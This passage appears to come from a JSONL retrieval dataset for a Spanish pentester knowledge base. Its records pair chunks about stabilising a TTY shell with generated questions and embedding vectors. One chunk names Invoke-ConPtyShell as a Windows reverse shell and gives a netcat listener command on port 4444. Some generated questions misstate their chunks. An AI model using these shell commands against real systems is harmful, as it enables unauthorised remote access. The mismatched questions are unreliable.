0.04611, -0.05869, 0.03282, 0.03196, -0.01086, -0.04589, -0.05368, 0.04039, 0.06846, 0.12093, 0.0039, 0.05556, -0.01726, -0.05879, -0.00756, -0.12251, -0.03717, 0.04538, -0.02776, -0.0723, -0.11122, -0.02133, 0.01873, -0.0251, 0.00422, -0.03434, 0.04515, 0.01501, 0.00927, -0.002, 0.06571, 0.12063, -0.07937, -0.03133, 0.03296, 0.02881, 0.00225, 0.07988, -0.02206, -0.04109, 0.00231, 0.0695, 0.05344, 0.02801, -0.06836, -0.04861, 0.03926, -0.03462, -0.05249, 0.02134, -0.05166, 0.04758, -0.06194, -0.01983, -0.00067, -0.03559, 0.04872, -0.01839, 0.08378, 0.03594, -0.05952, 0.01097, -0.00755, 0.00475, 0.00946, -0.0211, 0.09661, 0.04066, -0.05562, -0.0717, -0.05563, 0.08856, 0.08147, -0.08295, -0.06819, -0.00575, -0.00091, 0.11171, -0.02548, -0.0907, -0.06944, 0.00248, 0.00951, 0.02455, 0.05517, -0.09366, 0.00457, -0.00195, 0.02627, -0.02178, 0.02098, 0.02627, -0.08455, -0.01664, 0.00552, 0.00983, -0.0941, -0.06546, 0.05695, 0.10803, 0.03418, -0.02231, 0.04709, 0.0078, -0.06375, -0.08933, -0.04543, -0.02307, -0.01666, 0.02497, -0.03303, -0.01134, 0.01236, -0.01866, 0.01128, -0.04419, -0.04363, 0.01137, -0.07321, -0.04217, -0.03694, 0.04952, 0.00374, -0.00634, -0.04237, -0.0052, 0.01422, -0.09641, -0.04286, 0.03841, -0.02871, -0.04951, 0.03258, -0.04363, -0.06069, 0.06651, 0.01234, -0.05806, -0.02848, 0.00057, 0.02274, 0.0031, -0.00346, 0.02234, 0.03246, -0.02759, -0.0087, 0.01373, 0.01505, -0.00381, 0.01808, 0.01986, 0.02425, 0.06824, 0.01724, -0.0184, -0.02317, 0.03298, -0.01828, 0.00229, 0.03569, 0.04038, -0.02883, -0.03341, -0.02742, 0.04116, -0.02661, 0.04982, -0.00925, -0.01054, 0.02766, -0.00062, 0.0567, -0.04451, -0.07726, -0.04249, -0.04301, -0.05605, 0.0467, 0.04215, -0.05319, 0.00057, 0.05857, 0.06504, -0.04228, 0.03122, -0.06282]} -{"tipo": "pregunta", "herramienta": "Estabilizar shell TTY", "perfil": "PENTESTERS", "fichero": "conocimiento/03 - Shells/Estabilizar shell TTY.md", "tema": "shells", "fuente": null, "licencia": null, "texto": "# Enter, Enter\nexport TERM=xterm\nstty rows 40 columns 120\n```\n- `rows`/`cols` los sacas con **`stty size`** en TU Kali.", "indexar": "quΓ© programa o comando uso para cambiar el tamaΓ±o de la terminal en mi sistema Kali?", "v": [-0.10226, 0.08674, -0.05293, -0.18073, -0.02711, -0.14877, -0.02777, 0.01926, -0.11823, 0.00473, -0.14634, -0.07333, 0.04208, -0.06754, 0.03541, 0.01656, 0.05514, -0.15188, 0.13274, -0.04077, -0.00966, -0.03744, 0.03083, -0.04676, 0.01952, 0.12405, 0.04797, -0.14528, -0.18431, -0.08395, 0.01288, 0.02483, 0.11792, -0.13248, -0.04411, 0.0358, 0.04744, -0.00696, 0.05736, 0.13769, 0.01522, -0.00592, -0.01038, 0.06779, 0.11346, -0.07046, 0.13632, 0.00701, 0.08233, -0.06082, -0.00709, 0.00159, -0.00286, 0.05378, 0.1149, -0.09858, 0.06542, -0.12248, 0.00649, -0.03289, -0.05205, -0.05839, 0.02945, 0.10006, 0.03212, -0.04207, -0.05974, -0.0217, -0.13665, 0.08758, -0.03601, -0.01541, -0.02646, 0.0568, -0.01338, 0.01963, 0.01631, -0.07271, 0.14119, -0.05874, -0.03306, 0.06522, -0.08716, 0.08714, -0.0113, -0.08193, -0.04994, -0.06757, -0.02129, 0.04956, 0.03773, -0.04532, 0.08232, 0.10351, 0.09375, -0.04815, -0.03005, 0.04853, -0.03146, 0.06974, 0.11908, -0.02651, -0.08993, 0.13752, -0.02621, 0.02138, 0.06651, -0.07183, 0.01442, 0.00508, 0.03083, -0.05001, 0.13533, -0.02008, -0.09652, -0.04179, 0.03161, -0.02501, -0.07359, -0.10981, -0.12223, 0.06128, -0.02406, 0.02415, 0.13331, -0.0078, -0.04519, 0.05538, 0.09826, 0.0717, 0.0024, -0.01117, 0.03008, -0.05447, -0.06353, -0.03915, 0.01908, -0.02478, -0.04679, -0.00389, -0.06101, 0.11355, 0.00889, 0.01685, 0.05445, -0.01037, 0.06214, -0.02922, -0.04857, -0.00212, 0.02206, 0.03841, -0.01744, -0.01812, -0.04804, -0.02777, 0.03437, -0.03471, -0.08333, 0.01108, -0.09879, -0.08803, 0.00495, 0.0312, 0.07197, -0.04103, -0.01452, -0.01992, 0.0537, 0.02688, 0.00263, 0.05714, 0.0666, 0.00978, 0.01105, -0.01369, -0.03324, -0.05595, 0.02041, -0.00447, -0.04815, 0.12041, 0.04831, 0.03871, -0.0078, -0.01751, -0.02494, 0.06836, -0.02311, 0.006, 0.04257, 0.08861, 0.04873, -0.03169, 0.01243, 0.00337, 0.04392, -0.03246, -0.01205, -0.01397, -0.03359, 0.10296, 0.04782, -0.06061, 0.05877, 0.02264, -0.03154, -0.00075, 0.04053, 0.07845, -0.00468, 0.02098, 0.07128, 0.0412, -0.06139, -0.04541, -0.03049, 0.09672, 0.05298, 0.05117, 0.00999, -0.02827, 0.01074, 0.04509, -0.04241, -0.03762, -0.01652, -0.00781, 0.01746, -0.00758, -0.03056, -0.04747, -0.00204, -0.02339, 0.03176, -0.05285, 0.01987, 0.02966, 0.00599, -0.10615, 0.0036, 0.08096, -0.02492, -0.05197, -0.00981, -0.00635, -0.06364, -0.02533, -0.03393, 0.01659, -0.08623, 0.03765, 0.00803, -0.0656, -0.04176, 0.02866]} -{"tipo": "pregunta", "herramienta": "Estabilizar shell TTY", "perfil": "PENTESTERS", "fichero": "conocimiento/03 - Shells/Estabilizar shell TTY.md", "tema": "shells", "fuente": null, "licencia": null, "texto": "# Enter, Enter\nexport TERM=xterm\nstty rows 40 columns 120\n```\n- `rows`/`cols` los sacas con **`stty size`** en TU Kali.", "indexar": "cΓ³mo puedo ajustar las dimensiones del terminal a 40 filas y 120 columnas?", "v": [0.22029, 0.02021, -0.07775, -0.05644, 0.04139, -0.06183, -0.09904, -0.01539, -0.06149, 0.06331, -0.09093, -0.03997, -0.07038, -0.06237, 0.14495, -0.0126, 0.00364, -0.14004, 0.02608, -0.02407, -0.01837, -0.18822, -0.14001, -0.05198, 0.08924, 0.04357, 0.04983, -0.04574, -0.12305, -0.1369, 0.09923, -0.06181, 0.1146, -0.09364, -0.04828, -0.00994, -0.0908, 0.05465, -0.10049, 0.01636, -0.10447, 0.08778, 0.00243, -0.03563, -0.00675, -0.09538, -0.01045, 0.02145, -0.02746, -0.05218, -0.04588, 0.01899, 0.05422, 0.10196, -0.00316, -0.07435, 0.20743, -0.05015, 0.09124, -0.03172, 0.05551, 0.03848, 0.0847, 0.09523, -0.0011, -0.01424, -0.09747, 0.04474, -0.07521, -0.02694, -0.05765, 0.00546, -0.09188, 0.03137, -0.03536, 0.01635, 0.05477, -0.09686, 0.0412, 0.06015, 0.00174, 0.0616, -0.08448, 0.01123, 0.04727, -0.03589, -0.09893, 0.02023, -0.04771, 0.06463, 0.03231, -0.08618, 0.05473, -0.01844, -0.06686, -0.10952, -0.09545, 0.10049, -0.04284, -0.01642, 0.02456, 0.08232, -0.08388, 0.11471, -0.01095, 0.11902, -0.08356, -0.09138, 0.08476, -0.1111, 0.08847, 0.0614, 0.05372, -0.07667, -0.14525, -0.03893, -0.0171, -0.01147, 0.02799, -0.04254, -0.00149, 0.05746, 0.01951, 0.03765, 0.03599, -0.01696, -0.02613, 0.03185, 0.03891, -0.07711, 0.0428, -0.00536, 0.07743, 0.01129, -0.01167, -0.03677, 0.04659, -0.08813, -0.08445, 0.02388, -0.05, 0.02754, -0.05914, -0.0008, 0.05707, -0.00206, -0.09662, -0.03902, -0.15166, -0.06894, 0.07156, -0.00474, -0.00114, 0.12087, 0.06274, 0.02666, -0.05371, -0.00807, -0.11366, 0.0546, -0.03116, -0.00701, 0.02883, -0.02786, 0.08212, -0.01063, -0.05016, -0.02347, 0.00318, -0.06987, -0.00443, 0.00458, -0.05893, -0.0374, 0.00869, -0.0134, -0.02316, 0.02447, 0.00144, 0.05631, -0.01354, -0.00126, 0.01184, -0.09168, 0.01346, -0.06591, -0.00638, 0.00754, 0.06446, 0.04259, 0.03006, 0.03731, -0.01579, -0.00078, -0.02087, 0.00943, 0.00679, 0.01772, -0.02596, 0.01396, -0.00551, 0.12832, 0.01106, -0.06918, -0.00909, 0.02184, -0.10949, 0.0484, 0.03598, 0.00289, 0.0082, -0.02869, 0.0041, -0.00229, -0.01407, -0.06284, 0.0043, 0.01984, 0.11211, 0.04374, 0.02369, -0.04564, 0.03622, 0.06905, -0.04875, 0.04193, 0.0562, 0.03353, 0.01406, 0.00487, 0.01207, 0.07669, -0.02662, -0.03503, 0.048, -0.0845, 0.02412, 0.02016, -0.01366, 0.00241, 0.06504, 0.05418, -0.00447, 0.08219, 0.04738, -0.07324, -0.06614, -0.00904, -0.00163, -0.00518, -0.02681, -0.01068, 0.02766, -0.01733, 0.00983, -0.03319]} -{"tipo": "pregunta", "herramienta": "Estabilizar shell TTY", "perfil": "PENTESTERS", "fichero": "conocimiento/03 - Shells/Estabilizar shell TTY.md", "tema": "shells", "fuente": null, "licencia": null, "texto": "# Enter, Enter\nexport TERM=xterm\nstty rows 40 columns 120\n```\n- `rows`/`cols` los sacas con **`stty size`** en TU Kali.", "indexar": "cuΓ‘l es la herramienta que me permite definir el nΓΊmero de filas y columnas de la terminal?", "v": [0.12148, 0.0809, -0.07165, -0.05881, 0.09299, -0.1628, -0.06382, -0.05873, -0.07135, 0.01228, -0.14025, 0.00421, 0.02053, -0.08792, 0.14241, 0.03607, -0.08823, -0.18887, 0.02781, -0.03232, -0.08017, -0.08855, -0.08308, 0.02597, -0.06368, -0.05641, 0.02754, -0.06123, -0.17019, -0.06102, 0.10796, -0.11923, 0.06871, -0.18437, 0.05796, -0.03746, -0.0568, 0.08049, -0.10573, 0.02759, -0.10505, 0.02867, -0.08117, 0.0732, 0.04134, -0.07625, -0.12065, 0.04727, 0.01795, 0.02535, 0.00693, -0.0865, -0.01768, 0.08276, 0.01087, -0.14414, 0.16543, -0.0217, 0.106, -0.04162, -0.06324, -0.00811, -0.0204, 0.02712, -0.01808, -0.00043, -0.01056, -0.02606, -0.03919, 0.07448, 0.04573, 0.05296, -0.0161, 0.04328, 0.05464, 0.01246, -0.03391, -0.04227, 0.10536, 0.04391, 0.09876, -0.03679, -0.12373, 0.06929, 0.01097, -0.02016, 0.00516, 0.06991, -0.04109, -0.01791, 0.03457, 0.00326, -0.00486, 0.07963, -0.02384, 0.00787, -0.03192, 0.07489, -0.01202, 0.03113, 0.14742, 0.03278, -0.11813, 0.04964, 0.04771, -0.00146, -0.03826, -0.07567, 0.01235, -0.08459, 0.08584, 0.02324, 0.09861, -0.00633, -0.0595, 0.01714, 0.00482, 0.01381, -0.039, -0.08528, 0.05813, 0.04503, 0.01165, -0.08067, 0.06552, -0.00082, -0.09964, 0.07192, 0.08614, -0.05434, -0.00355, -0.01888, -0.02749, 0.01564, -0.10121, -0.03, 0.08533, -0.13466, 0.00803, -0.00618, -0.03401, 0.01364, -0.05917, -0.07252, 0.06905, 0.01159, -0.05333, -0.03176, -0.10681, -0.07135, -0.03412, -0.07261, -0.01351, 0.0517, -0.07188, 0.04554, -0.00952, 0.0024, -0.10178, 0.09941, -0.04792, -0.1088, -0.01831, 0.0185, 0.04847, -0.02781, -0.02164, 0.00396, 0.10881, -0.04294, 0.06509, -0.00556, -0.00029, 0.00802, -0.00423, -0.01108, -0.08165, -0.00418, -0.0009, -0.06128, -0.0659, -0.00678, -0.05897, -0.04921, 0.00488, -0.07181, -0.0331, -0.03111, 0.05507, 0.09488, 0.01992, 0.0551, -0.03472, -0.05198, 0.0036, 0.01025, 0.01696, -0.05953, 0.06897, -0.00402, -0.06007, 0.02202, 0.037, -0.06907, 0.05732, 0.1121, -0.1431, 0.02148, 0.03184, 0.01282, 0.01559, -0.01958, 0.01261, -0.01435, -0.02015, -0.07073, -0.02193, 0.01492, 0.00091, 0.02607, 0.02792, -0.02242, 0.05174, -0.00969, -0.02901, 0.04778, 0.0213, 0.07178, 0.045, -0.00789, 0.02649, -0.02093, 0.02429, -0.02333, 0.04146, -0.04097, 0.04295, -0.02645, -0.04606, -0.06825, 0.03504, 0.07721, -0.00821, -0.01516, -0.06133, -0.02853, -0.0489, -0.01036, -0.03763, -0.04387, -0.08677, 0.00809, 0.06879, -0.02766, 0.02036, -0.04581]} -{"tipo": "pregunta", "herramienta": "Estabilizar shell TTY", "perfil": "PENTESTERS", "fichero": "conocimiento/03 - Shells/Estabilizar shell TTY.md", "tema": "shells", "fuente": null, "licencia": null, "texto": "## Windows\n- Usa **Invoke-ConPtyShell** (Reverse shell) para una shell interactiva real.\n- Listener con `stty raw -echo; (stty size; cat) | nc -lvnp 4444`.", "indexar": "que programa puedo usar para abrir una terminal remota en Windows", "v": [-0.04193, 0.00231, -0.18099, -0.23423, 0.05429, -0.03208, -0.05865, -0.04301, -0.04349, -0.0499, -0.12867, -0.14, 0.07583, -0.01888, -0.04183, 0.00061, -0.04579, -0.03097, 0.12491, -0.0362, -0.00029, -0.01432, -0.04365, 0.02355, 0.02472, 0.02501, 0.0506, -0.08521, -0.03756, -0.13189, 0.04777, -0.07912, 0.12838, -0.07707, -0.00858, 0.00917, 0.05312, 0.0124, 0.10318, 0.05718, 0.11038, 0.07234, -0.09661, 0.09827, 0.165, -0.02615, 0.12881, -0.06533, -0.01021, -0.03649, -0.01694, -0.07261, -0.02067, -0.01069, 0.10188, -0.02092, 0.10416, -0.1174, -0.01928, 0.05626, -0.00818, 0.08295, 0.03539, 0.0441, -0.01746, -0.10236, 0.04682, 0.05578, -0.10978, 0.15404, -0.10905, 0.01356, 0.05037, 0.07039, 0.00976, 0.09041, -0.16432, -0.05589, 0.16202, 0.00043, -0.00353, 0.04943, 0.05207, -0.05861, -0.06757, -0.18086, -0.00729, 0.0721, 0.03555, -0.09043, 0.07162, -0.01447, -0.05003, 0.11097, 0.07387, -0.10037, -0.02934, 0.0135, -0.04034, 0.02943, 0.05166, -0.02375, -0.01105, 0.10995, -0.06542, 0.02301, 0.05281, -0.12965, -0.05423, -0.0148, 0.0623, -0.01145, -0.01495, -0.02768, -0.13297, -0.03311, -0.03304, -0.04399, -0.00365, -0.00256, -0.06959, -0.01081, -0.07498, 0.02793, 0.09224, -0.07139, -0.03185, 0.12943, -0.02506, 0.06657, 0.01702, -0.00674, -0.01375, -0.04763, -0.09051, -0.04302, 0.01046, -0.08722, 0.02449, -0.03894, 0.02603, 0.05526, 0.0208, -0.00254, 0.06658, 0.01355, -0.03544, 0.00434, -0.06192, -0.06324, 0.08594, -0.04931, -0.03737, 0.00139, -0.09532, 0.00033, 0.05772, 0.0622, -0.02046, 0.03153, -0.06515, -0.0342, -0.07653, -0.06319, 0.04172, -0.03909, -0.0461, -0.01181, 0.07172, -0.00482, -0.00687, 0.09474, 0.0355, 0.00932, 0.02272, -0.00359, 0.02081, -0.06493, -0.03789, -0.04234, -0.10138, 0.0082, 0.06122, -0.04471, -0.02263, 0.00624, -0.03458, 0.00361, -0.04398, 0.01213, -0.02168, 0.01551, 0.01908, 0.00714, 0.01404, -0.02002, 0.00528, -0.00815, 0.02094, -0.01462, -0.04856, 0.00664, 0.0054, -0.07943, 0.1199, 0.04676, -0.08524, 0.0321, 0.06744, 0.08587, -0.00663, -0.04291, 0.01543, -0.00378, -0.01259, -0.06077, -0.0455, 0.01147, 0.024, 0.03431, -0.0116, 0.01238, 0.02121, 0.0727, 0.0315, -0.00993, -0.01995, 0.02327, 0.02652, -0.03141, 0.00614, 0.00062, 0.00895, -0.01423, -0.00876, -0.04792, 0.00367, -0.04861, 0.00822, -0.01251, -0.06971, 0.11588, -0.00159, -0.06603, -0.04966, 0.0028, -0.04886, 0.0172, -0.03602, -0.02849, -0.07888, 0.01165, 0.04442, -0.03508, -0.00958, 0.102]} -{"tipo": "pregunta", "herramienta": "Estabilizar shell TTY", "perfil": "PENTESTERS", "fichero": "conocimiento/03 - Shells/Estabilizar shell TTY.md", "tema": "shells", "fuente": null, "licencia": null, "texto": "## Windows\n- Usa **Invoke-ConPtyShell** (Reverse shell) para una shell interactiva real.\n- Listener con `stty raw -echo; (stty size; cat) | nc -lvnp 4444`.", "indexar": "con quΓ© herramienta puedo recibir comandos desde un servidor en Windows", "v": [0.0035, 0.11397, -0.10161, -0.18831, -0.0337, -0.11066, -0.00233, -0.08683, -0.00412, -0.10082, -0.12553, -0.05869, 0.05099, -0.12735, -0.02189, 0.15888, 0.20869, -0.07099, -0.00886, 0.03908, 0.0665, -0.02395, -0.01179, -0.02206, -0.05027, 0.04333, 0.1046, -0.0269, -0.13837, -0.01026, 0.00875, -0.04585, 0.0101, -0.02534, -0.02771, -0.02192, -0.09446, 0.15844, -0.01691, 0.10542, 0.0089, 0.07582, -0.09183, 0.05134, 0.05973, -0.07396, 0.05854, -0.05753, 0.11079, -0.03315, -0.04094, -0.17462, -0.13061, -0.05538, -0.03655, -0.05833, 0.21522, -0.1448, 0.07658, -0.02632, -0.1354, 0.05276, -0.06897, 0.02797, 0.00695, -0.02254, -0.00085, -0.1233, -0.04015, 0.07743, -0.12229, 0.02754, -0.01793, -0.02369, 0.07123, 0.02997, -0.05849, 0.00042, 0.12117, -0.02405, 0.06527, 0.09169, -0.06495, 0.04252, -0.05862, -0.16495, -0.0264, -0.03548, 0.05584, -0.08823, 0.05706, 0.02502, -0.07905, 0.08703, 0.05194, -0.00302, 0.04, -0.06202, 0.0052, 0.02277, 0.06732, -0.05743, -0.09737, 0.12567, -0.00458, 0.07782, 0.04819, -0.11336, -0.01927, -0.01521, 0.04741, -0.02275, -0.01381, 0.0251, -0.07104, -0.03383, -0.00354, -0.07779, 0.01767, 0.03657, -0.08718, 0.05629, -0.03768, 0.06619, 0.03102, -0.08045, -0.00468, 0.05961, -0.02725, -0.05273, -0.00026, -0.02673, -0.01229, -0.04328, -0.05501, 0.07982, 0.05077, -0.07714, -0.05047, -0.12334, 0.05638, 0.05097, 0.02414, -0.01024, 0.07107, -0.01477, 0.08266, -0.03106, -0.08144, -0.03478, 0.08709, -0.06631, -0.04834, -0.01139, -0.09757, -0.01007, -0.0292, 0.04753, -0.06522, 0.02491, -0.0095, -0.00681, -0.0023, 0.04401, 0.02863, -0.0529, -0.00426, 0.05264, 0.03472, 0.03853, -0.03284, 0.0394, 0.01301, -0.02604, 0.00231, -0.04944, -0.04686, -0.00699, -0.02594, -0.02211, -0.06187, 0.05215, -0.06462, -0.04646, -0.01915, -0.04174, -0.03554, 0.02103, -0.02383, 0.02087, -0.03589, 0.06022, 0.01865, -0.05398, 0.03341, -0.03482, -0.00896, -0.03957, -0.02418, -0.0165, -0.07864, -0.00299, -0.0135, -0.08245, 0.05825, 0.02383, -0.04409, 0.05946, 0.05098, 0.04235, -0.00281, -0.00383, 0.04519, -0.0202, -0.02208, -0.053, 0.03722, -0.01089, -0.03122, -0.04196, 0.02888, 0.00428, 0.04944, -0.01754, 0.01455, 0.0073, -0.0536, 0.00078, 0.05421, 0.00703, 0.01267, -0.00203, -0.02522, -0.02032, 0.02855, -0.02631, 0.02435, -0.03781, -0.04543, -0.02202, -0.04216, 0.07656, 0.00895, -0.10198, -0.03944, -0.08729, -0.01387, -0.02754, -0.05112, -0.05411, -0.00402, -0.0133, 0.04236, -0.06217, -0.05042, -0.00107]} -{"tipo": "pregunta", "herramienta": "Estabilizar shell TTY", "perfil": "PENTESTERS", "fichero": "conocimiento/03 - Shells/Estabilizar shell TTY.md", "tema": "shells", "fuente": null, "licencia": null, "texto": "## Windows\n- Usa **Invoke-ConPtyShell** (Reverse shell) para una shell interactiva real.\n- Listener con `stty raw -echo; (stty size; cat) | nc -lvnp 4444`.", "indexar": "cual es una alternativa libre a los shells interactivas de Linux en Windows", "v": [0.0508, 0.05956, -0.0247, -0.03387, -0.05402, -0.11927, -0.23441, -0.03271, -0.03809, -0.02415, 0.02608, -0.17857, -0.02488, -0.03909, 0.06187, -0.07427, -0.08216, -0.15164, 0.01799, -0.0756, -0.13341, 0.06299, -0.2548, -0.02819, 0.0196, -0.04325, 0.00745, -0.07684, 0.02756, 0.07155, -0.09038, -0.04208, 0.0126, 0.03132, -0.06525, 0.07272, 0.03073, 0.05001, 0.19826, 0.0357, 0.05584, 0.03157, -0.04379, 0.13122, 0.00404, -0.13832, 0.00667, -0.07961, 0.07679, -0.01586, -0.01288, 0.02255, -0.07053, 0.02277, 0.11997, -0.06112, 0.16914, -0.15873, 0.00913, -0.00221, -0.14314, 0.11352, -0.02156, -0.01988, 0.07236, 0.01864, -0.07758, -0.07126, -0.04931, 0.12301, 0.0624, 0.05153, 0.04164, 0.00313, -0.04866, 0.09824, -0.12111, 0.0087, 0.04466, 0.01074, 0.0472, -0.02916, 0.10928, 0.05283, -0.03335, -0.18171, -0.00546, -0.07947, -0.0246, -0.00147, 0.09039, 0.00527, -0.00786, 0.17592, 0.05447, -0.07442, 0.01462, 0.10397, 0.0298, 0.05729, -0.07117, 0.00859, -0.1382, 0.08235, 0.00618, 0.01959, -0.03735, 0.00458, -0.05278, 0.01701, 0.08375, 0.02696, 0.03533, 0.02098, -0.03989, -0.01374, -0.04967, -0.00312, 0.00819, 0.00748, -0.04659, -0.01522, -0.06405, -0.0311, 0.00322, 0.0103, -0.05682, 0.11243, -0.08097, -0.0111, 0.08583, -0.09228, -0.02108, -0.05321, -0.07523, 0.02904, 0.05667, -0.08694, 0.03366, -0.04281, 0.05391, 0.06896, 0.04335, 0.01874, 0.04609, 0.00019, 0.04414, 0.04527, -0.0268, -0.05183, -0.05365, -0.01889, -0.00833, 0.05096, -0.07069, -0.0063, -0.00096, 0.09189, -0.04306, -0.00639, 0.0264, -0.06445, 0.0165, 0.03912, -0.0526, -0.02615, -0.0686, 0.03464, -0.02951, -0.03186, 0.0041, 0.1203, 0.02504, -0.04974, 0.02522, -0.05991, 0.0394, -0.05571, -0.00813, -0.04299, 0.00206, 0.04595, -0.02339, -0.0669, -0.02606, -0.01608, -0.052, 0.05278, -0.04451, 0.00718, -0.01984, -0.00387, -0.01778, -0.03481, -0.00359, 0.05096, -0.01044, -0.02635, -0.01266, 0.02051, -0.06989, 0.04839, -0.00526, -0.03978, 0.02148, 0.03697, -0.04165, 0.03081, 0.04522, 0.01177, 0.02991, 0.06254, 0.06461, 0.03468, 0.00067, -0.03344, 0.03825, 0.01655, 0.03104, 0.02715, 0.01824, 0.01993, 0.04785, -0.0312, -0.02315, -0.04582, -0.02271, 0.03654, -0.00868, -0.02039, 0.03105, 0.00169, 0.04598, 0.05765, -0.01776, -0.00918, 0.01178, 0.03477, 0.02335, -0.00041, -0.031, 0.09817, -0.02664, -0.05659, -0.03927, -0.04215, -0.05512, -0.01708, -0.02984, -0.05291, -0.06968, -0.01499, 0.01846, 0.01364, -0.05189, 0.03756]} -{"tipo": "pregunta", "herramienta": "Estabilizar shell TTY", "perfil": "PENTESTERS", "fichero": "conocimiento/03 - Shells/Estabilizar shell TTY.md", "tema": "shells", "fuente": null, "licencia": null, "texto": "## Por quΓ©\n- Sin TTY: muchos exploits de Privesc Linux (los que piden `sudo`/interacciΓ³n) fallan.\n\nRelacionado: Puesto de mando Kali Β· OSCP MOC", "indexar": "que programa puedo usar para realizar pruebas de intrusiΓ³n en Linux sin necesidad de acceso a la terminal", "v": [-0.10187, 0.08451, -0.26831, -0.2424, 0.06542, -0.08016, -0.15155, 0.0182, -0.05196, 0.06819, -0.07833, -0.01228, 0.02269, -0.04655, -0.0395, -0.03973, -0.05977, -0.14223, 0.0251, -0.04956, -0.105, 0.06271, -0.09976, 0.02724, 0.05175, 0.12845, 0.01603, -0.14923, 0.07365, -0.10572, -0.08218, -0.00645, 0.12555, -0.01519, -0.03496, -0.06175, -0.02574, 0.03248, 0.11029, 0.16971, 0.11355, -0.02752, -0.06399, 0.08243, 0.0465, -0.11363, 0.10588, -0.01793, 0.00413, -0.09742, 0.0287, 0.01338, -0.06349, -0.00668, 0.08664, -0.04212, 0.08393, -0.15104, 0.05755, 0.0014, -0.13072, 0.01545, 0.03124, 0.03282, 0.05866, -0.0293, 0.00106, 0.06634, -0.09513, 0.05763, -0.04043, 0.08003, -0.02435, -0.02712, -0.03515, 0.01283, -0.10503, 0.01681, 0.10276, -0.00229, -0.00015, 0.03371, 0.03617, 0.01179, -0.12778, -0.15696, 0.06228, -0.00235, -0.00307, 0.03215, 0.07111, 0.04025, 0.01192, 0.05652, 0.11549, -0.05534, 0.01482, 0.05984, 0.0409, -0.05009, 0.04905, 0.04641, -0.06645, 0.13318, -0.03888, 0.00039, 0.07123, -0.05989, 0.01326, -0.09425, 0.05084, -0.03944, 0.01218, -0.06888, -0.13109, -0.0159, -0.04149, -0.03116, -0.053, -0.08211, -0.07314, -0.042, -0.03248, 0.00078, 0.04564, -0.05166, -0.01562, 0.08529, -0.00941, 0.01736, 0.05314, -0.04274, 0.00482, 0.02262, -0.07245, -0.04854, -0.02079, -0.12823, -0.02813, 0.03625, 0.03914, 0.04091, 0.01501, 0.01177, 0.0907, 0.04255, -0.08121, -0.02863, -0.06577, -0.05622, -0.0207, -0.00838, -0.01765, 0.06571, -0.08519, -0.03576, 0.08291, -0.02951, -0.06007, 0.04783, -0.08909, -0.02128, -0.07114, 0.02072, 0.01306, -0.01178, -0.04115, -0.01638, 0.01126, 0.03266, 0.00383, 0.0585, -0.00346, -0.0414, 0.03821, -0.01708, -0.01029, -0.08256, -0.00589, -0.04506, -0.053, 0.02763, -0.00476, -0.04005, 0.04807, -0.01207, -0.01938, 0.03167, 0.07268, 0.02172, 0.05047, 0.06837, -0.02627, 0.03226, 0.00328, 0.02658, -0.00837, -0.00296, -0.00406, -0.02424, -0.09268, 0.02068, -0.01126, -0.05829, 0.06914, 0.0605, -0.07205, 0.00347, 0.00493, 0.04762, 0.02752, -0.01591, 0.07734, -0.02264, -0.00261, -0.0278, 0.0214, 0.06832, 0.01318, 0.04484, 0.00878, 0.03045, 0.04839, 0.03544, -0.01868, -0.05329, 0.02776, 0.02441, 0.03294, 0.01029, -0.00429, 0.01249, -0.00428, -0.01324, 0.02379, -0.01712, -0.00637, -0.02676, -0.00365, -0.10008, -0.03692, 0.11545, 0.00042, -0.05919, -0.04334, -0.02559, -0.07357, -0.00167, 0.01299, -0.01509, -0.04656, 0.02701, 0.02322, -0.04535, 0.01431, 0.05134]} -{"tipo": "pregunta", "herramienta": "Estabilizar shell TTY", "perfil": "PENTESTERS", "fichero": "conocimiento/03 - Shells/Estabilizar shell TTY.md", "tema": "shells", "fuente": null, "licencia": null, "texto": "## Por quΓ©\n- Sin TTY: muchos exploits de Privesc Linux (los que piden `sudo`/interacciΓ³n) fallan.\n\nRelacionado: Puesto de mando Kali Β· OSCP MOC", "indexar": "con quΓ© herramienta simulo los exploits que requieren interacciΓ³n como sudo", "v": [0.06519, 0.097, -0.20468, -0.17041, 0.02888, -0.14173, -0.18988, -0.03128, 0.05069, -0.0081, -0.08606, -0.0327, -0.00822, -0.03891, -0.03464, -0.0495, 0.03766, -0.11357, -0.08339, -0.01239, 0.00841, 0.077, -0.01068, -0.02623, -0.06564, 0.04502, 0.05192, 0.04032, -0.06592, -0.01563, -0.01891, 0.0766, 0.12078, -0.09798, -0.09847, -0.08923, -0.00014, 0.00061, 0.06436, 0.17539, -0.01669, 0.00229, -0.1979, -0.02287, 0.0723, 0.00836, -0.10702, 0.01637, 0.00348, 0.09504, -0.02101, -0.07108, -0.16139, -0.09515, 0.08084, -0.13232, 0.18801, -0.20436, 0.05499, -0.03966, -0.21457, -0.05031, 0.06021, -0.01137, 0.02651, -0.05278, 0.0107, -0.01394, -0.11356, 0.19424, -0.04713, 0.02885, -0.02419, 0.05613, -0.00346, -0.03972, 0.02692, 0.03096, -0.02299, -0.03513, 0.03994, -0.00679, -0.03994, 0.03979, -0.07665, -0.07589, 0.07532, -0.02227, -0.00078, -0.02773, -0.01521, 0.05495, 0.01994, -0.02917, 0.07813, -0.05441, 0.05711, -0.04011, 0.01023, 0.02211, 0.00193, -0.06166, -0.14953, 0.04442, -0.03675, 0.02035, -0.03133, -0.00969, -0.09102, -0.0199, 0.06455, -0.00819, 0.06284, 0.02031, 0.05894, 0.06892, -0.06338, -0.09219, 0.04564, -0.15486, -0.05495, 0.02224, 0.00313, -0.03286, -0.03072, 0.00611, -0.0707, 0.03978, 0.04697, -0.05898, -0.02802, -0.04284, -0.03655, -0.00923, 0.04149, -0.02193, 0.01851, -0.14737, -0.04483, -0.09711, -0.00456, 0.04965, 0.00854, -0.15167, 0.00882, 0.04755, 0.01864, 0.00564, -0.06928, -0.03398, -0.02911, -0.04139, -0.06136, 0.02953, -0.067, -0.02501, -0.01635, 0.02363, -0.0205, 0.05439, 0.00239, -0.11281, 0.0182, -0.00592, 0.0101, -0.08177, -0.02728, -0.00406, 0.01572, 0.0291, -0.04846, 0.04669, 0.09337, -0.0309, 0.01145, -0.00205, -0.02307, 0.01806, 0.00234, -0.0395, -0.02878, 0.02146, 0.04302, -0.0238, -0.00099, -0.08433, -0.03959, -0.02966, -0.00789, 0.03302, 0.02634, 0.04935, 0.05281, -0.01813, 0.0722, -0.00469, -0.02359, -0.0295, 0.04028, 0.00866, -0.01463, 0.01444, -0.02352, -0.06595, 0.0392, 0.06557, -0.02638, 0.01616, -0.03087, 0.05575, 0.02982, -0.0131, 0.01875, 0.00086, 0.02203, 0.00373, -0.00747, 0.02521, -0.00697, -0.04747, 